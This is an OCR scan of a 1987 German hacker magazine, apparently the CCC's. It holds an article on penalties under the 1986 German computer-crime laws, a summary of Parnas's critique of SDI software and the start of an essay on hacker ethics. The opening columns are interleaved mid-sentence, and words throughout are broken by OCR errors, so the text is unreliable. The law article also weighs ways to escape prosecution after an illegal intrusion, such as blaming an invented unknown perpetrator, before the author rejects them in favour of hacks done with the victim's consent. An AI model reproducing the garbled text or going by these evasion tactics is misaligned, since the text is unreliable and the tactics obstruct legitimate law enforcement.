ker zu “bezahlen“ hat, wenn er sich erwischen naten 7 « uewshren 
läßt. Der NASA-Hack, der wieder viele unbe¬ 
darfte Nachahmer motivieren dürfte, sowie die Gerichtsentscheidungen sind, soweit mir bekannt, 
die jüngsten Hausdurchsuchungen beim CCC - hierzu noch nicht ergangen. Die soeben ausgeführte 
Steffen und Wau - wegen angeblicher Hacks bei Argumentation halte ich für richtig, und sie ist im 
CERN (Schweiz) und Philips (Frankreich) sind juristischen Schriftum inzwischen vorherrschend, 
ein guter Anlaß, die Tarifstruktur durchschau- Yqp daher ist davon auszugehen, daß eine Straf¬ 
bar zu machen. barkcit wegen Ausspähens von Daten schon dann in 

Betracht kommt, wenn die Daten nur durch eine 
Mit Wirkung vom 1.8.1986 sind die in der Presse Paßwortabfrage gesichert sind, 
sogenannten Anti-Hacker-Gesetze in Kraft getreten. 

Korrekt geht es um das zweite Gesetz zur Be- DamitsindwirbeidemProblem:Wannhatmansich 
kämpfung von Wirtschaftskriminalität (2. WiKG). (oder einem anderen) Daten “verschafft“? Zum 
Nachfolgend wollen wir einmal betrachten, was die- einen, wenn man selbst von den Daten Kenntnis 
se Gesetze dem Hacker so zu bieten haben. erlangt (also wenn man sie liest) bzw. einem anderen 

die Kenntnisnahme ermöglicht. Auch ohne Kennt- 
Für den preiswenen Einstieg (bis zu 2 Jahren Frei- nisnahme sind die Daten “verschafft“, wenn man sie 

heitsstrafc oder Geldstrafe) wäre zunächst der neue Besitz nimmt. Das wäre der Fall, wenn die frem- 
Ü 202a StGB zu nennen. Besonderer Voneil: Je- Daten auf einem Datenträger mitgespeichert 

derzeit problemlos zu buchen! In Ü 202a StGB wird oder auf Papier ausgedruckt werden, 
das “Ausspähen von Daten“ unter Strafe gestellt. 

Sffafbar macht sich, “wer unbefugt Daten, die nicht ^gj. jg^ Paßwortschulz eines Systems knackt 
für ihn bestimmt und gegen unberechtigten Zugang sich dann in dem System umsieht, das heißt 

besonders gesichert sind, sich oder einem anderen Daten liest oder downloaded, hat den Ü 202a StGB 
verschafft“. fest gebucht. Wer erwischt wird, könnte sich aller- 

Sxtlcnädjlcukcr 




dings darauf berufen, er habe nur das Paßwon ge¬ 
knackt, sich dann aber sofort wieder ausgeloggi, 
ohne sich im System weiter umgesehen zu haben. 
Das ist zwar kaum wahrscheinlich, das Gegenteil 
dürfte aber nur schwer zu beweisen sein. 

Fraglich ist, ob diese Argumentation geeignet ist, 
einer Strafe wegen Ausspähens von Daten zu ent¬ 
gehen. Immerhin ist das erhackte Paßwort auch ein 
Dalum, was man sich verschafft hat. Und zwar eins, 
das besonders geschützt ist: Quasi durch das Pa߬ 
wort selbst! Warten wir ab, wie die Gerichte ent¬ 
scheiden werden. 

Festzuhalten bleibt, daß wer in eine durch Paßwor¬ 
tabfrage gesicherte Mailbox, Datenbank oder ein 
sonstiges Rechnersystem (vorsätzlich) unbefugtein¬ 
dringt, mit einer Strafe wegen Ausspähens von Da¬ 
ten zu rechnen hat. Als kleines Bonbon für gefrustete 
Hacker: Der Versuch ist nicht unter Strafe gestellt. 
Außerdem wird die Straftat nur auf Antrag des Ver¬ 
letzten verfolgt. D.h., daßdie S taatsan waltschaft von 
sich aus die Tat nicht verfolgen kann. 

SoweitderBilligtariffür Einsteiger. Aber das Gesetz 
hat für extravagante Kunden auch noch teurere An¬ 
gebote auf Lager. Z.B. für solche, die Daten zer¬ 
stören oder verändern. Dazu zählen auch der Einsatz 
von Viren oder (die wohl auch beim NASA-Hack 
eingestzten) Trojanischen Pferde. Damit sind wir 
beim Thema Datenveränderung (Ü 303a StGB) und 
Computersabotage Ü 303b StGB). 

Der Tarif für die schlichte Datenveränderung ist 
noch relativ moderat: Es wird Freiheitsstrafe bis zu 
zwei Jahren oder Geldstrafe geboten. Computersa¬ 
botage kommt schon teurer: Freiheitsstrafe bis zu 5 
Jahren oder Geldstrafe. Manche Hacker werden sich 
jetzt vielleicht in die Brust werfen, bekannte Phrasen 
über “Hacker-Ethos“ ablassen und kategorisch fest¬ 
stellen: “Hacker sabotieren nicht.“ - Doch! So zum 
Beispiel die NASA-Hackerl (Oder waren das gar 
keine “Hacker“ ???) 

Zunächst zur Datenveränderung. Bestraft wird, wer 
Daten “löscht, unterdrückt, unbrauchbar macht oder 
verändert“. Da ist das Gesetz einmal so erfreulich 
deutlich, daß es auch dem Laien kaum noch kom¬ 
mentiert zu werden braucht. Praktisch jede Mani¬ 
pulation von gespeichenen Daten wird von der 
Norm erfaßt. Dazu gehört natürlich auch das Er¬ 
gänzen von Daten, zum Beispiel das Einfügen eines 
neuen Paßworts in die Passwort-Datei. Fast über¬ 
flüssig zu erwähnen, daß Programme selbstver- 

EntcnBililcahcr 


.stündlich auch Daten sind. Werden Programme 
durch Viren oder Trojanische Pferde verändert, so 
liegt eine strafbare Datenveränderung vor. Dies 
kommt ebenso in Betracht, wenn Daten an einen 
anderen Empfänger umgeleitet oder sonst abgefan¬ 
gen werden. 

Im Gegensatz zum Ausspähen von Daten ist hier 
auch schon der Versuch strafbar. Stümperei schützt 
also vor Strafe nicht! Verfolgt wird die Datenve¬ 
ränderung - wie auch die im Anschluß vorgestellte 
Computersabotage- nurauf Antrag. Bei besonderem 
öffentlichen Interesse kann die Staatsanwaltschaft 
aber auch von Amtswegen, also ohne Strafantrag des 
Verletzten, einschreiien. 

Die Computersabotage (Ü 303B StGB) soll uns hier 
nur in ihrer ersten Fallgestalt (Ü 303b I Nr.l StGB; 
Nr.2 bezieht sich nur auf Be.schädigung von Hard¬ 
ware) interessieren. Dort baut sie auf der Datenve¬ 
ränderung auf. Compulersabotage ist demnach eine 
Daten Veränderung (wie oben dargestellt), wenn da¬ 
durch “eine Datenverarbeitung, die für einen frem¬ 
den Betrieb, ein fremdes Unternehmen oder eine 
Behörde von wesentlicher Bedeutung ist“, gestön 
wird. 

“Von wesentlicher Bedeutung“ ist eine DVA, wenn 
von ihrem störungsfreien Ablauf die Funktions- 
tiiehtigkeit des Betriebes im Ganzen abhängt. Dies 
betrifft heute, rasch zunehmend, die meisten Be¬ 
triebe, Unternehmen oder Behörden, die eine elek¬ 
tronische Datenverarbeitung einsetzen. 

Keineswegs falsch dürfe die Annahme sein, daß die 
EDV-Anlagen der NASA und der ihr angeschlos¬ 
senen Forschungsinstitute für ihre Betreiber eine 
wesentliche Bedeutung haben. In diesen Anlagen 
der NASA (und anderer Institute) sind bei dem 
NASA-Hack Daten durch Einsatz von Trojanischen 
Pferden verändert worden. Damit haben die NASA- 
Hacker ein schönes Beispiel für eine Computersa¬ 
botage geliefert. Auch bei der Computersabotage ist 
schon der Versuch strafbar. Zur Erforderlichkeit 
eines Strafantrags siehe oben. 

Im folgenden zweiten Teil dieses Artikels werden 
die etwas teureren Normen vorgestellt und Überle¬ 
gungen angestellt, ob und wie unter bestimmten 
Umständen sttafireies Hacken möglich sein könnte. 



CLINCH/DS-RED/SrOEPSEU30.09.87/23:20/8494 2 . 

7 






Die aktuellen Tarife für’s Hacken 

2.Teil ----------------- 


I 


I ackern, denen selbst bei Androhung von bis zu fünf 
Jahren Freiheitsstrafe noch der rechte Nervenkitzel 
fehlt, kann geholfen werden. So sind im Rahmender 
“Anii-Hacker-Gesetze“ Normen eingefühn worden, 
nach denen in besonderen Fällen bis zu 10 und sogar 
bis zu 15 Jahren Freiheitsstrafe verhängt werden 
kann. Mehr hat unser Strafrecht selbst einem Tot¬ 
schläger nicht zu bieten. 



8 


Btx 655322 



Die Normen, bei denen die angesprochenen hohen 
Strafen (in besonders schweren Fällen) verhängt 
werden können, sind der Computerbeirug (Ü 263a 
StGB) und die Fälschung bewciserhcblichcr Daten 
(Ü 269 StGB). 

Hier sind wir wieder an einem Punkt, wo “ehrliche“ 
und “ehrenhafte“ Hacker aufbegehren werden: “Be¬ 
trügen tun wir wirklich nicht!“ - Nein, wirklich 
nicht? Da wäre ich mir gar nicht so sicher. 

Der Computerbetrug nach Ü 263a StGB baut auf 
dem “normalen“ Betrug auf. Er soll Strafbarkeits¬ 
lücken schließen, wenn statt eines Menschen ein 
Computer “betrogen“ wird. Daher sei hierzunächst 
der schlichte Betnig nach Ü 263 StGB erklärt. 

Der Betrug nach Ü 263 StGB setzt in Kurzfonn 
folgendes voraus: Der Täter nimmt einem anderen 
gegenüber eine Täuschungshandlung vor. Diese be¬ 
wirkt bei dem Getäuschten einen Irrtum. Aufgrund 
dieses Irrtums nimmt der Getäuschte eine vermö- 
gensschädigende Verfügung über eigenes oder 
fremdes Vermögen vor. 

Beim Computerbetrug nach Ü 263a StGB ist die 
Vermögensschädigung eines Dritten nun auch straf¬ 
bar, wenn nicht eine Person, sondern ein Computer 
durch Eingriffe ins Programm oder durch Manipu¬ 
lation von Daten etc. “getäuscht“ wird. Ein einfaches 
Beispiel für einen Computerbetrug: Bankange¬ 
stellter A manipuliert die im Computer seiner Bank 
gespeicherten Daten so, daß sein Minuskonto wieder 
einen schönen Guthabenbetrag ausweist. Fälle die¬ 
ser Art mögen dem Gesetzgeber in erster Linie vor¬ 
geschwebt sein, als erden Ü 263aeinführte, Aber die 
Anwendbarkeit des Computerbetrugs geht erheblich 
weiter. So ist der Gebrauch von “Leih-NLU’s“ un¬ 
problematisch als Computerbetrug zu bewerten. 
Denn das Vermögen des NUI-lnhabers wird dadurch 
geschädigt, daß durch unbefugte Benutzung von 
Daten (NUI Teil A und B) der Ablauf eines Daten- 
verabeitungsvorgangangs (beim PAD durch Lei¬ 
stungsgewährung an den Unberechtigten) beeinflußt 
wird. Dieser Vermögensschaden ist "sioffgleich“ 

SatcnBii)lciiber 


mit dem Veimögensvorteil, den der Täter anstrebt 
und auch erwirbt. Damit liegen die Voraussetzungen 
des Computerbetrugs vor. 

Entsprechend dürften, abhängig vom Einzelfall, die 
Voraussetzungen eines Computerbetruges auch 
dann vorliegen, wenn mit einem fremden oder fal¬ 
schen Paßwort ein anderes Netzwerk für eine preis¬ 
werte Datenreise geöffnet wird. Von daher könnte 
auch unterdiesem Gesichtspunkt beim N AS A-Hack 
ein Computerbetrug begangen worden sein. 

Allgernein ist zu den Voraussetzungen des Com¬ 
puterbetrugs noch anzuraerken, daß strafb.ir nur die 
vorsätzliche Handlung ist. Wie schon angedeutet, 
muß zusätzlich, wie bei Ü 263 auch, der Täler die 
Absicht haben, sich durch seine Handlung einen 
rechtswidrigen Vermögensvorteil zu verschaffen. 
Auch beim Compuicrbeirug ist schon der Versuch 
strafbar. 

Abschließend kommen wir zur Fälschung bewei- 
scrheblichcrDaten (Ü 269 StGB). Bestraft wird nach 
dieser Norm, wer zur Täuschung im Rechtsverkehr 
beweiserhebliche Daten so speichert oder verändert, 
daß bei ihrer Wahrnehmung eine unechte oder ver¬ 
fälschte Urkunde entstehen würde. Ebenso bestraft 
wird, wer derart gespeicherte oder verändene Daten 
gebraucht. Aufgrund des doch recht beiiächiUchen 
Strafrahmens - es können bis zu fünf, und wie bereits 
dargelegi, in besonders schweren Fällen bis zu 15 
Jahren Freiheitsstrafe verhängt werden - soll hier 
etwas näher erläutert werden, wann eine Strafbarkeit 
nach LI 269 StGB vorliegen könnte. 

Ü 269 StGB knüpft an den Ü 267 StGB (Urkun¬ 
denfälschung) an. Im Unterschied zu Urkunden sind 
Daten nicht unmittelbar wahrnehmbar. Die Daten 
sind im Hauptspeicher des Computers oder auf Da¬ 
tenträger gespeichert. Dort sind sie für den Men¬ 
schen nicht ohne Hilfsmittel sichtbar. Erst wenn die 
Daten auf einem Bildschirm angezeigt oder von 
einem Drucker ausgedruckt werden, sind sie wahr¬ 
nehmbar. Frühestens dann könnten die Daten eine 
Urkunde sein. Der Gesetzgeber wollte die Straf¬ 
barkeit aber vorverlegen auf den Zeitpunkt der Ma¬ 
nipulation der Daten. Das hat den Vorteil, daß die 
Strafbarkeit nicht zufällig davon abhängt, ob bzw. 
wann die Daten sichtbar gemacht werden. Deswegen 
ist in Ü 269 StGB unter Strafe gestellt worden, 
beweiserhebliche Daten so zu manipulieren, daß 
diese Daten - wären sie unmittelbar wahrnehmbar - 
eine unechte oder verfälschte Urkunde darstellen 
würden. 

9 


















Emscheidend ist, was unter einer unechten oder 
verfälschten Urkunde zu verstehen ist. Eine unechte 
Urkunde würden die Daten bei ihrer Wahrnehm¬ 
barkeit sein, wenn über den Aussteller der Urkunde 
getäuscht wird. Also wenn die Daten nicht von 
demjenigen stammen, von dem sie zu stammen 
scheinen. Verfälscht wird eine Urkunde, wenn eine 
zunächst echte Urkunde so verändert wird, daß ihr 
Inhalt dem Erklärenden (Aussteller) nicht mehr zu¬ 
zurechnen ist. 

Ebenfalls bestraft wird das Gebrauchen der in oben 
beschriebener Weise manipulierten Daten. Ein Ge¬ 
brauchen liegt z.B. vor. wenn dem zu Täuschenden 
die Daten auf einem Datenträger überlassen oder am 
Bildschirm sichtbar gemacht werden. 

Dazu ein Beispiel; Banklehrling L “spielt“ an dem 
Rechner seines Kreditinstituts herum. Dabei mani- 
pulien erdie im Rechner gespeicherten Daten so, daß 
sein Girokonto endlich mal wieder schwarze Zahlen 
zeigt. Außerdem richtet er sich ein neues Sparbuch 
mit einem Guthaben von 100.000,- DM ein. - Im 
ersten Fall würde bei Wahrnehmbarkeit der Daten 
eine verfälschte, im zweiten eine unechte Urkunde 
vorliegen. 

Gut, so etwas tut ein Hacker nicht. Aber eine NUI 
“leiht“ er sich doch schon einmal aus. Dabei ist die 
Rechtslage nicht so zweifelsfrei wie bei dem obigen 
Beispiel, abereine Fälschung beweiserheblicher Da¬ 
ten kommt auch dort in Betracht. Denn durch Ein¬ 
gabe der NUI Teil A und B scheint doch der NUI- 
Inhaberzu erklären,daß erdie Verbindung zum PAD 
hergestellt hat und für die anfallenden Gebühren 
(notgedrungen) aufkommen will. Wären diese be¬ 
weiserheblichen Daten unmittelbar wahrnehmbar, 
würden sie wohl als Urkunde einzustufen sein. In der 
Literatur ist dieses Beispiel noch nicht erörtern wor¬ 
den, aber mir scheint, daß man hier das Vorliegen 
eines Delikts der Fälschung beweiserheblicher Da¬ 
ten bejahen müßte. 

Damit sind die wichtigsten Tariffragen für Hacker 
geklärt. Klar dürfte jetzt sein, daß es kaum möglich 
ist, zu hacken, ohne sich strafbar zu machen. Damit 
stellt sich für Einzelpersonen und Vereine, die die 
Unsicherheit der Netze erforschen und aufdecken 
wollen (und nur um die soll es hier gehen - Hackern 
die aus purer Neugier, Geltungssucht oder sogar 
Gewinnsucht handeln, kann und will ich nicht hel¬ 
fen) die Frage, ob und wie sie noch hacken können, 
ohne ein großes Strafrisiko auf sich zu nehmen. 
Denn eins sieht fest; Der legendäre HASPA-Coup 


JE SCHARFER, 


des CCC ließe sich bei der heutigen Gesetzeslage 
nicht wiederholen, ohne daß die Akteure mit 
Freiheits- und/oder Geldstrafen rechnen müßten! 

Theoretisch bieten sich zwei Möglichkeiten an. Die 
erste Möglichkeit wäre, sich um die Gesetze nicht 
viel zu scheren, aber dafür zu sorgen, daß einem 
nichts nachgewiesen werden kann. Die zweite Mög¬ 
lichkeit wäre so vorzugehen, daß man sich trotz 
raffinierter Hacks nicht strafbar macht. 

Wenden wir uns zunächst der ersten Möglichkeit zu. 
Sie hat den Vorteil, daß man sich kaum Einschrän¬ 
kungen beim Hacken auferlegen müßte. Der große 
Nachteil ist der gewaltige Risikofaktor dabei. 

Da ja Zweck der ganzen (jung sein soll, sich nach 
einem erfolgreichen Hack an die Öffentlichkeit zu 
wenden, um die Sicherheilslücken publik zu ma¬ 
chen, muß man zwangsläufig den Kopf aus der 
Deckung nehmen und damit auch den Strafverfol¬ 
gungsbehörden eine Angriffsfläche bieten. 

Es scheint sich nur eine halbwegs erfolgsverspre¬ 
chende Lösung anzubieten, wie man dennoch einer 
Bestrafung entgehen könnte. Dies wäre ein Vorge¬ 
hen, ähnlich wie der CCC beim NASA-Hack prak¬ 
tiziert hat. Man bekennt nicht, die Tat selbst verübt 
zu haben. Stattdessen schiebt man den großen Un¬ 
bekannten vor, der die Tat begangen habe, die man 
selbst nun für ihn publik mache. Solange sich nicht 
beweisen läßt, daß der Unbekannte eine Erfindung 
ist und der wahre Täter der den Hack Publizierende 
ist, kann letzterer auch nicht bestraft werden. 

Da derjenige, der den Hack publiziert, angeblich 
nicht Täter ist, ist er grundsätzlich als Zeuge zur 
Aussage verpflichtet. Wird die Aussage verweigert, 
kann ein Ordnungsgeld verhängt und Erzwin¬ 
gungshaft bis zu 180 Tagen angeordnet werden. Also 
auch keine rechte Perspektive. 

SntciiSdjIciibcr 


DESTO ANREGENDER 


Hiergegen hilft nur, sich darauf zu berufen, daß man 
keine sachdienlichen Angaben machen könne. Dies 
ist beieinemdetalierten Bericht überden Hack kaum 
glaubwürdig. Daher wäre die Gefahr einer Erzwin¬ 
gungshaft auf diese Weise nur schwerlich abzu¬ 
wenden. Ein anderer Ausweg wäre noch, sich auf das 
Zeugnisverweigerungsrecht zu berufen. Ein solches 
steht einem zu, wenn man sich andernfalls selbst 
oder einen nahen Verwandten belasten müßte. Da¬ 
mit ist dann der große Unbekannte aber im Prinzip 
wieder gestorben. Die Staatsanwaltschaft wird 
schnell nachweisen können, daß das Zeugnisver¬ 
weigerungsrecht nicht besteht, oder aber oen la- 
terkreis sehr eng eingrenzen können. Damit stellt 
sich die Frage; Gibt es Beweise die sich finden 
ließen, Zeugen die bei bohrender Befragung “sin¬ 
gen“ könnten? Wenn ja, dann ist das Spiel verloren! 

Erheblich sicherer ist e.s da. jemand einzuschallen, 
der aus beruflichen Gründen ein Zeugnisverweige¬ 
rungsrecht hat; Einen Rechtsanwalt. Dieser wird 
damit betraut, im Namen seiner nicht zu benen¬ 
nende.: Mandanten der Öffentlichkeit die entspre¬ 
chenden Erklärungen und Belege für den Hack ab¬ 
zugeben. Aber auch diese Methode ist nicht ohne 
Nachteile. Auch wenn der Anwalt weder Aussagen 
braucht noch machen darf, so läßt sich doch mög¬ 
licherweise über den Anwalt auf die in Betracht 
kommenden Täter schließen. Wenn das gelingt, 
stellt sich wieder die Frage; Läßt sich bei denen 
etwas finden, gibt es undichte Zeugen? 

Überzeugen können alle diese Varianten nicht. Da¬ 
her sollte untersucht werden, wie man Aktionen 
starten kann, bei denen man sich erst gar nicht 
strafbar macht. 

Da, wie in den ersten Teilen dargestellt, praktisch 
keine Möglichkeit besteht, einen erfolgreichen Hack 
durchzuführen, ohne mit Strafgesetzen in Konflikt 
zu geraten, gibt es nur noch eine Möglichkeit; Bloß 

Sntciiürf/Iciibcr 


solche Hacks zu machen, bei denen man zuvor eine 
Einwilligung des Opfers einholt. Bei einer Wie¬ 
derholung des HASPA-Coups etwa müßte man 
vorher zu HASPA gehen und sagen, was man vor hat, 
warum man es vorhat, und dafür um Erlaubnis bitten. 
Wenn man diese erhält und sich ausschließlich im 
Rahmen dieser Einwilligung bewegt, ist jedes Slra- 
frisiko ausgeschlossen. 

Wenn man sein Vorhaben vorher genau ankündigen 
muß, mindert das natürlich die Erfolgsaussichten 
rapide, da der Betroffene sich auf den bevorstehen¬ 
den Angriff einstellen und vorbeiten kann. Ander¬ 
seits ist die Wirkung im Erfolgsfalle umso größer. 
Schließlich ist der Hack dann unter erschwerten 
Umständen geglückt. 

Fraglich ist natürlich, ob sich die erforderlichen 
Einwilligungen bekommen ließen. Das hängt ganz 
von dem jeweiligen Betroffenen ab, und wie man 
ihm das Projekt verkauft. Einerseits wird das po¬ 
tentielle Opfer eines Hacks kein Interesse daran 
haben, daß öffentlich vorgeführt wird, wie unge¬ 
nügend seine Sicherheifsmaßnahmen sind. Ande¬ 
rerseits würde er sich gewiß gerne damit brüsten 
können, daß sein System nicht geknackt werden 
konnte. Außerdem erhielte er praktisch eine ko¬ 
stenlose Sicherheitsüberprüfung, für die sich man¬ 
che Unternehmen in den USA teure “Haus-und- 
Hof-Hacker“ halten. 

So gesehen ist es vielleicht gar nicht so unwahr¬ 
scheinlich, legale Hacks machen zu können. Ich 
denke, daß diese Möglichkeit näher untersucht wer¬ 
den sollte. Unterm Strich ist sie wohl für alle Be¬ 
teiligten die beste aller möglichen Lösungen. 

Stoepsel 

CLINCH/DS-RED/STOEPSEL/30.09.87/23;27/12330 

11 




Bit-Dschungel 

Software 


in der SDI- 


Der Leiter der University of Victoria, Victoria, 
Canada; Navel Research Laboratory, Washing¬ 
ton, D.C.) gegenüber der SDI-Organistion hat 
seinen Verzicht auf die weitere Mitarbeit im Aus¬ 
schuß für computergestützte Kriegsführung dar¬ 
gelegt. Im Foigenden werden einige Auszüge sei¬ 
ner Begründung wiedergegeben. Dabei sind 
wörtiich übersetzte Zitate in Anführung (’) ein¬ 
geschlossen. 



Einleitend weist Prof. Pamas darauf hin, daß seine 
Schlußfolgerung, daß seine Arbeit des Ausschusses 
nutzlos sei, nicht politisch motiviert ist. In der Ver¬ 
gangenheit hat er sich nicht geweigen, an militärisch 
geförderten Forschungsprojekten mitzuwirken. 
'Meine Schlußfolgerungen basieren auf mehr als 
20-jähriger Forschung in der Softwareentwicklung, 
einschließlich einer mehr als 8-jährigcn Entwick¬ 
lungsarbeit an Software für Realzeitsysteme, die für 
Militärflugzeugen eingesetzt werden.Sie beruht auf 
der Vertrautheit sowohl mit militärisch genutzter 
Software als auch mit der Forschung in der 
Computer-Wissenschaft. ’ 

Seine Begründung ist in acht jeweils zwei bis drei 
Seiten langen Artikeln niedergelegt: 


zu 1) 

Für Softwareprodukte wird häufig eine Garantie¬ 
leistung ausgeschlossen Das liegt daran, daß Indu- 
strieprodukte mit analog arbeitenden Maschinen er¬ 
zeugt werden und die Funktionsweise dieser Ma¬ 
schine durch stetige Funktionen beschrieben wer¬ 
den. Die entsprechenden mathematischen Modelle 
sind entwickelt und seit langem beherrscht. Dem¬ 
gegenüber sind Softwarekomponenten Systeme mit 
einer sehr großen Anzahl diskreter Zustände. Die 
zahlreichen Einzelzustände und Wechselwirkungen 
der Komponenten untereinander können derzeit 
durch kein mathematisches Modell annähernd voll¬ 
ständig beschrieben werden. Eventuell kann die ma¬ 
thematische Logik für die Softwareeniwicklung die 
Rolle der Analysis in der traditionellen Technik 
übernehmen. Derzeitreichen diese Methoden jedoch 
bei Weitem nicht aus, selbst kleine Softwaresysteme 
zu behandeln. 



zu 2) 

Wenn Software die für SDI erforderlichen Eigen¬ 
schaften besitzen soll, muß man sich felsenfest ver¬ 
lassen können, bevor man das gesamte Verteidi¬ 
gungskonzept darauf abstellt. Aus folgenden Grün¬ 
den ist dieser hohe Grad der Zuverlässigkeit nicht 
erreichbar; 


1) Warum arbeitet Software unzuverlässig ? 

2) Warum das SDI-Softwaresystem nicht ver¬ 
trauenswürdig sein wird. 

3) Warumbei konventioneller Softwareentwicklung 
keine zuverlässigen Programme entstehen. 

4) Die Grenzen der Methoden des Softwareengi¬ 
neerings. 

5} Künstliche Intelligenz und SDI. 

6) Kann automatisierte Programmierung das SDI- 
Software-Problem lösen ? 

7) Kann Programmverifikation die SDI-Software 
vertrauenswürdig machen ? 

8) Ist die SDI-Organisation ein effizienter Weg er¬ 
folgreiche Forschung zu ermöglichen ? 


1) Ohne genaue Kenntnis der ballistischen Eigen¬ 
schaften der Ziele, die mit Hilfe der SDI-Software 
identifiziert, verfolgt und letztlich vernichtet werden 
sollen, müssen schwerwiegende Fehlreaktionen die' 
Folge sein. Es liegen jedoch keine genauen Infor¬ 
mationen über alle Ziele vor. 

2) 'Es wird unmöglich sein, das System unter rea¬ 
listischen Bedingungen vor einem Einsatz zu testen.’ 

3) Da einige Sensoren und Abwehrsystemc über 
eigene rechnergestützte Leitsysteme verfügen, ent¬ 
steht so ein Gesamtsystem, das wesentlich kompli¬ 
zierter als alle bisherigen Systeme ist. 



SafcnSd/lciifrcr 


zu 3) 

Die konventionelle Methode der Softwareentwick¬ 
lung ist, 'wie ein Computer zu denken’. Die Kom¬ 
plexität eines Problems und die Abhängigkeit von 
Bedingungen, die erst zum Ablaufzeitpunkt ermit¬ 
telt werden, führt stets dazu, daß Softwarefehler bei 
Tests oder sogar erst während de.! Einsatzes fest¬ 
gestellt werden. In der Industrie gibt es eigenstän¬ 
dige Arbeitsgruppen, die unabhängig vom Pro¬ 
grammierer Test durchführen (Qualitätssicherung). 
Diese Möglichkeit steht aber für die SDI-Software 
nicht zur Verfügung (s. 2)). 

zu 4) 

Die wichtigsten Methoden bei der Erstellung großer 
Softwaresysteme sind; 

1) strukturierte Programmierung und der Gebrauch 
formaler Programmiersprachen 

2) formale Spezifikation abstrakter Schnittstellen 

3) der Einsatz kooperierender sequentieller Prozes¬ 
se. 


Anhand eines Projektes der US-Marine zeigt Prof. 
Parnas auf, warum die Softwareerstellung uotzdem 
nicht problemlos erfolgen kann. Effizientere Pro¬ 
grammiersprachen und Programmcnlwicklungs- 
werkzeuge können zwar diese Probleme mildem, 
aber nicht beseitigen. 'Methoden des Software - 
Engineerings verhindern keine Fehler.... die erfol¬ 
greiche Anwendung dieser Methoden hängt ab von 
der Erfahrung, die mit der Erstellung und Pflege 
vergleichbarer Systeme gesammelt wurde. Es gibt 
keinen derartigen Erfahrungsschatz für das SDI- 
Kriegsführungssystem. ... Ich gehe davon aus, daß 
auch die Forschung der nächsten 20 Jahre keine 
Aendemng dieser Tatsache erbringen wird.’ 


) ODservatonum an Kontroli- 
] Zentrum Oie Rakete ist 
I 800 Kilometer entlernt Der 
I Atommotor hat automatisch 
f gezündet 


zu 5) 

Da insbesondere auch eine so moderne Technologie 
wie die der künstlichen Intelligenz im Rahmen der 
SDI-Forschung eine große Rolle spielen soll, warnt 
Prof. Pamas vor übertriebenen und unrealistischen 
Erwanungen ('Künstliche Intelligenz stellt keinen 
Zauber zur Lösung unserer Probleme dar. Insbe¬ 
sondere ist der Einsatz von Computersystemen, de¬ 
ren Problemlösungsstrategien denen menschlicher 
Experten nachempfunden ist, gefährlich, da sich die 
Regeln, die man aus der Beobachtung der men¬ 
schlichen Handlungsweise gewinnt, als inkonsi¬ 
stent. unvollständig und ungenau heraussteilen. 

£ntcii8ri;lctikcr 




Nach Meinung von Prof. Pamas ist automatisierte 
Programmierung nichts ohne (algorithmische) Pro¬ 
grammiersprachen, aber Fehlerfreiheit garantieren 
sie auch nicht. 

'Außerdem ist eines der grundlegenden Probleme 
bei SDI. daß uns die Information fehlt, vertrauens¬ 
würdige Spezifikationen aufzuschreiben.’ 


zu 7) 

Abgesehen davon, daß bisher nur für im Vergleich 
zur SDI-Software kleinen Programmen eine Ver¬ 
ifikation erfolgreich durchgeführt wurde, muß vor 
einer Verifikation zunächst eine vollständige Pro¬ 
grammspezifikation vorliegen (s, 2), 6)). Außerdem 
soll die SDI-Software auch dann noch funktionsfä¬ 
hig bleiben.selbst wenn Teile des Gesamtsystems 
zerstört sind. 

Es gibt aber bisher, trotz 20-jähriger Forschung auf 
diesem Gebiet, 'keine Beweistechniken für die Kor¬ 
rektheit eines Programms beim Auftreten nicht vor¬ 
hersehbarer Bedrohung bleiben. (..) Der Präsident 
ünd die Öffentlichkeit müssen dies wissen.’ 

CLINCH/POLITIK/HHNET/1 7.08.87/17:27/6617 Z. 

13 




What to know about Data Tra¬ 
vellers 

Datenreisen und Hackerethik ■■■■■■ 


Anläßlich des Bit Bang im September 1987 stellt 
sich von neuem die Frage nach der Ethik der 
Hackerkultur. 

Die meisten Statments des CCC in Bezug auf die 
Lebensweise der Hacker gehen in die Richtung; 
Hacken ist ein (Lebens-)Einsteilung, die auf Neugier 
beruht. Diese äußert sich im Hinterfragen auch der 
scheinbar feststehendsten Dinge dieser Welt. Die 
Antworten, die die Hacker finden, entsprechen oft 
nicht den angeblich so feststehenden Tatsachen. Es 
ist der gleiche Wissensdrang, der das Wissen der 
Menschheit seit Jahrhunderten vorantreibt. 

Trotzdem bleibt es eine Herangehensweise, die den 
meisten Menschen fremd ist. Hacken bedeutet stän¬ 
dige Selbstbeobachtung und -Kontrolle, gleichzeitig 
eine Offenheit fürdieabwegigsten Ideen. Wichtig ist 
nur eines: daß die Idee weiter auf dem eingeschla¬ 
genen Pfad führt. 

Weiterhin hat der Hacker Erfahrungen gemacht, die 
ihm sein Wissen, sprich seine Macht, vor Augen 
führt und gleichzeitig die Ohnmacht der meisten 
anderen Menschen deutlich macht. Kaum einer ist 
dazu mehr berufen, die Fähigkeiten und Schwächen 
eines Computers zu beurteilen als ein Hacker, der 
sich intensiv mit dem Rechner auseinandergestzt 
hat. 

Sie haben Respekt vor den Leuten, die noch ein 
Stückchen weiter sind als sie: die Systemhersteller. 
Sie verabscheuen Leute, die Daten oder Rechner 
zerstören, denn sie wissen nicht nur um deren In¬ 
formationsgehalt sondern auch um die Mühe, diesen 
zu erstellen. 

Hacker warnen nicht ohne Grund seit Jahren vor den 
Schwächen und Grenzen der Systeme. Sie wissen, 
wovon sie reden. Meist kennen sie nicht nurdas, was 
der normale Benutzer von den Systemen sieht. Hac¬ 
ker sind keine Anhänger blinden Glaubens an den 
Großen Bruder Computer. 

In einer Gemeinschaft sollte jeder einen Teil der 
Arbeit machen. Hacker tragen Ihren Teil zur Ge¬ 
meinschaft bei, indem sie versuchen ihre Erfahrun- 

14 



gen weiterzugeben. Kritik ist neben Kreativität der 
stärkste Motor auf dem Weg zu mehr Wissen. 

Ein Vorwurf lautet, Hacker würden gegen Gesetze 
verstoßen. 

Erstens einmal stellt sich da die Frage: gegen Ge¬ 
setze welchen Landes verstoßen sie denn nun, wenn 
sie aus Land A via Land B, C und D nach Land E 
Datenreisen. Nach bundesrepublikanischer Recht¬ 
sauffassung können sie gemäß bundesdeutschem 
Recht verurteilt werden, auch wenn Land E Papua 
Neu-Ginuea heißt. Eine Meinung, mit der die Bun¬ 
desrepublik ziemlich einsam auf weiter Flur steht. 
Zudem hielt der Gesetzgeber in seinen Erläuterun¬ 
